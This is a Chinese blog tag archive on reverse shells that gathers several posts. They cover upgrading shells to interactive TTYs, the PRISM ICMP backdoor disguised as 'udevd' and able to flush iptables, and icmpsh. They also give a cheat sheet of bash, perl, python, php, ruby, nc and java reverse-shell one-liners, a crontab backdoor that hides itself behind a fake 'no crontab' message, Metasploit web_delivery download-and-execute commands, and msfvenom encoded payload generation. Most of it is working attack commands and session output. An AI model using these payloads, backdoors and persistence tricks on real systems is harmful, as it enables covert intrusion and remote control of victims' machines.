标签归档:反弹

将简单的Shell升级为交互式

1)Python pty模块
对于已经安装了python的系统,我们可以使用python提供的pty模块命令如下:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
测试如下:

[root@server144 src]# ./netcat -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.192.120:42425
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")' 
[root@server120 src]# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin

不过还是无法使用向上使用历史命令、Ctrl+C、Tab补全。

2)使用socat
监听命令:

socat file:`tty`,raw,echo=0 tcp-listen:4444

反弹命令:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.192.144:4444

测试如下:

[root@server144 src]# socat file:`tty`,raw,echo=0 tcp-listen:4444 
[root@server120 src]# whoami
root
[root@server120 src]# sleep 5
^C
[root@server120 src]#

支持向上使用历史命令、Ctrl+C、Tab补全。

3)使用stty选项
刚才测试发现第一种方法不支持向上使用历史命令、Ctrl+C、Tab补全,可使用stty选项升级。
首先和第一种方法一样

[root@server144 src]# ./netcat -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.192.120:42450
python -c 'import pty; pty.spawn("/bin/bash")' 
[root@server120 src]# ^Z
[1]+ Stopped ./netcat -vv -l -p 2345
[root@server144 src]# echo $TERM
xterm
[root@server144 src]# stty -a
speed 38400 baud; rows 31; columns 104; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;
-parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel
-iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke

所需的信息是TERM类型(”xterm”)和当前TTY的大小(31行;104列)

[root@server144 src]# stty raw -echo

输入fg并执行(这里看不到输入,使用raw stty,可能看不到下一个命令,但是当你键入时,它们则会被执行。)

$ reset
$ export SHELL=bash
$ export TERM=xterm
$ stty rows 31 columns 104

然后就能支持向上使用历史命令、Ctrl+C、Tab补全。

参考文章:
http://www.freebuf.com/news/142195.html

Linux下ICMP后门PRISM

支持平台

Linux

Solaris

AIX

BSD/Mac

Android

 

功能

支持两种模式:ICMP和STATIC

进程名自定义

没有监听端口

支持清空iptables配置

pure C开发

没有依赖库

 

项目地址

git clone https://github.com/andreafabrizi/prism.git

 

编译

gcc <..OPTIONS..> -Wall -s -o prism prism.c

 

选项如下:

-DDETACH #后台运行

-DSTATIC #开启STATIC模式 (默认ICMP模式)

-DNORENAME #不使用自定义的进程名

-DIPTABLES #清空所有的iptables规则

 

ICMP模式

使用这种模式的后门将会在后台等待特定的包含主机/端口连接信息的ICMP数据包,通过私有密钥可以阻止第三方访问。后门进程接受ping包激活。

 

可以修改密钥,默认是p4ssw0rd

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       icmp

 Key:                           p4ssw0rd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

可以看到模式为icmp

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

攻击机(172.16.100.182):

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

发送icmp包

内容如下:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

然后获得Shell。

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

STATIC模式

后门尝试连接硬编码的IP:PORT

 

vim prism.c

#ifdef STATIC

# define REVERSE_HOST     "172.16.100.182"

# define REVERSE_PORT     6666

# define RESPAWN_DELAY    15

#else

# define ICMP_PACKET_SIZE 1024

# define ICMP_KEY         "p4ssw0rd"

#endif



#define VERSION          "0.5"

#define MOTD             "PRISM v"VERSION" started\n\n# "

#define SHELL            "/bin/sh"

#define PROCESS_NAME     "udevd"

可以看到自定义进程名称为udevd

重新编译

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c


[root@vincent prism-master]# ./prism Inf0

 Version:          0.5

 Mode:                       static

 Host:                         172.16.100.182

 Port:                          6666

 Respawn Delay:              15 sec

 Process name:                 udevd

 Shell:                         /bin/sh

 Detach:           Yes

 Flush Iptables:        No

攻击机(172.16.100.182):

nc -vv -l -p 6666

肉鸡(172.16.100.134):

./prism

查看进程

[root@vincent prism-master]# ps axu | grep udev | grep -v grep

root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd

获得Shell

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started



# whoami

root

 

使用icmp协议反弹shell

程序:https://github.com/inquisb/icmpsh#usage
在一些访问控制做的比较严格的环境中,由内到外的TCP流量会被阻断掉,文章主要讨论icmp shell的使用
特点:
1)开源程序
2)基于CS架构
3)服务端程序跨平台,支持C、perl、python
4)客户端仅支持Windows
5)不需要管理员权限

服务端需要先安装python包

[root@server120 icmpsh-master]# pip install Impacket
[root@server120 icmpsh-master]# ./run.sh
##################################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

##################################################################

-------------------------------------------------------------------
[?] What is the victims public IP address?
-------------------------------------------------------------------
192.168.192.122

[-] Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Local ICMP Replies are currently enabled, I will disable these temporarily now

[-] Launching Listener...,waiting for a inbound connection..
D:\>whoami
whoami
win-a94sbnf0i6b\administrator

 

客户端:
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

各种环境下反弹shell的姿势

bash版本:

bash -i >& /dev/tcp/106.187.43.96/2345 0>&1

注意这个是由解析shell的bash完成,所以某些情况下不支持

perl版本:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python版本:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php版本:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby版本:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc版本:

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java版本

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

转自:http://zone.wooyun.org/content/5064

利用crontab实现无文件兼容性强的反弹后门

最好用一个不常见的用户执行,任务写入/var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

升级猥琐版

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

crontab -l 直接提示no crontab for $username
[root@vincenthostname bin]# crontab -l
no crontab for root
反弹成功
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

转自:http://zone.wooyun.org/content/18244

Metasploit Web Delivery

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671

Metasploit Framework msfvenom

msfvenom命令行选项如下:

Options:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload,可以用“>”号代替 
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads

查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155

PHP利用msfvenom生成后门


查看下php相关payload

msfvenom -l payloads | grep php

这里我们用bind_php来测试

php/bind_php Listen for a connection and spawn a command shell via php

查看配置项

root@kali:~# msfvenom -p php/bind_php --payload-options

生成后门

msfvenom -p php/bind_php RHOST=172.16.100.155 R

去掉开头的/*
访问http://172.16.100.155/1.php查看监听

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

升级为Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

JAVA利用msfvenom生成后门


查看下可以使用的payload

msfvenom -l payloads | grep java

这里我们使用

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

访问后获取反弹shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows利用msfvenom生成后门


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

本地监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows生成powershell后门


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

然后Windows下运行powershell -file “test.ps1”

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm